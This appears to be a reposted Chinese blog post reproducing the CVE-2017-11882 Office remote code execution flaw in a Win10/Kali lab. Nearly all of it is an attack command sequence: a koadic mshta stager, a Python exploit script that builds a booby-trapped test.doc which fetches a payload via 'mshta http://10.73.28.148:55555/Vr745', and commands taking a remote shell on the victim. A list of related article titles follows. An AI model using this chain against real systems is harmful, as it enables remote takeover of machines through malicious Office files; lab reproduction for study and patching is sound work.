CVE-2017-11882-Office远程代码执行漏洞复现

Posted Carrypan

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了CVE-2017-11882-Office远程代码执行漏洞复现相关的知识,希望对你有一定的参考价值。

实验环境:win10+kali

工具:koadic,Command43b_CVE-2017-11882.py

KALI:

root@kali:/opt/koadic-master# ./koadic

(koadic: stager/js/mshta)# set lhost 10.73.28.148

(koadic: stager/js/mshta)# set lport 55555

(koadic: stager/js/mshta)# run

 python C:\\Users\\esafenet\\Desktop\\Command43b_CVE-2017-11882.py -c "mshta http://10.73.28.148:55555/Vr745" -o test.doc

win10上打开test.doc

(koadic: stager/js/mshta)# zombies 0

(koadic: stager/js/mshta)# cmdshell 0

 

以上是关于CVE-2017-11882-Office远程代码执行漏洞复现的主要内容,如果未能解决你的问题,请参考以下文章

远程代码执行漏洞是啥意思

Git 拉取远程代码

如何将本地代码提交到多个远程仓库

php 远程代码执行漏洞 怎么修复

openssh 远程代码执行漏洞 怎么解决

远程执行代码漏洞有啥危害?